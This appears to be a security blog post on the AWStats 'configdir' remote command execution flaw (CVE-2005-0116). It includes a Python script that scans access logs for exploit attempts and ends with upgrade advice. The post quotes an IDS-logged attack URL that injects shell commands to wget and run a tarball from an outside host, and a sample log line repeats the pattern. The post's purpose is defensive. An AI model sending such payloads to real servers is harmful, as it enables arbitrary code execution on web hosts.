“There is no delight in owning anything unshared.”

Cyberattacks December 2011 – AWStats Remote Command Execution Vulnerability

AWStats is a free, powerful tool that graphically generates advanced web, streaming, FTP or mail server statistics. This remote command execution vulnerability [CVE-2005-0116] was first reported back in 2005.

From one of the sample IDS logs:

The source is sending a hostile HTTP request towards the target:
GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1

Via this specially crafted HTTP request, the attacker intends to exploit the bug that resides in the awstats.pl Perl script. The script does not correctly sanitize the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs which are then used in a Perl open() function call. Note here that the bug is only found in AWStats version 6.2 and below. By exploiting this vulnerability, a remote attacker could supply AWStats with malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.
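
To turn the IDS observation above into something repeatable, here is an added example (my own code, not part of the original post or of AWStats) that scans web server access-log lines for awstats.pl requests whose ‘configdir’ value carries shell metacharacters; the log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not taken from the original post). The
# second line mirrors the shape of the IDS request quoted above; the others are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2011:10:01:02 +0000] "GET /cgi-bin/awstats.pl?config=example.com HTTP/1.1" 200 5120
198.51.100.9 - - [10/Dec/2011:10:01:05 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://example.invalid/x.tgz;echo| HTTP/1.1" 200 77
192.0.2.4 - - [10/Dec/2011:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Combined-log-format prefix: source IP, identd, user, timestamp, then the request line.
REQUEST_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# Characters that never belong in a directory path handed to awstats.pl. A value that
# begins or ends with '|' makes Perl's two-argument open() run it as a shell command,
# which is exactly what the configdir exploit relies on.
SHELL_META_RE = re.compile(r'[|;&`$\n]')

def query_params(target):
    """Split a request target's query string into {name: decoded value}; '&' is the
    only separator, so the ';' used in the injected shell command stays in the value."""
    params = {}
    for pair in urlsplit(target).query.split('&'):
        name, _, value = pair.partition('=')
        if name:
            params[unquote(name)] = unquote(value)
    return params

def is_configdir_injection(target):
    """True if the target requests awstats.pl with a configdir carrying shell metacharacters."""
    if not urlsplit(target).path.endswith('/awstats.pl'):
        return False
    value = query_params(target).get('configdir', '')
    return bool(SHELL_META_RE.search(value))

def scan_log(text):
    """Return (source_ip, decoded configdir) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_configdir_injection(m.group('target')):
            hits.append((m.group('src'), query_params(m.group('target'))['configdir']))
    return hits

if __name__ == '__main__':
    for src, cfg in scan_log(SAMPLE_LOG):
        print(f"{src} sent configdir={cfg!r}")
```

A hit from this scan on a host still running AWStats 6.2 or below should be treated as a probable compromise of the web server account, not just a blocked probe.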

Advisories:
Ensure AWStats has been upgraded to the latest version (6.9 or later).

Any security-related issues on AWStats are available here:
